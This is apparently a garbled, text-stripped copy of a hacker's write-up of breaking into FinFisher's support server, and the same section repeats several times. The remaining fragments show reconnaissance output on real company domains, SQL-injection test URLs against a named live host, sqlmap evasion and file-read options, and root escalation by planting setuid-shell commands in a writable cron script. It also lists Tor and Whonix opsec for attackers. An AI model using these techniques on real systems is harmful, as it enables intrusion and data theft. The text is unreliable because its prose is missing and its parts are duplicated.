https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
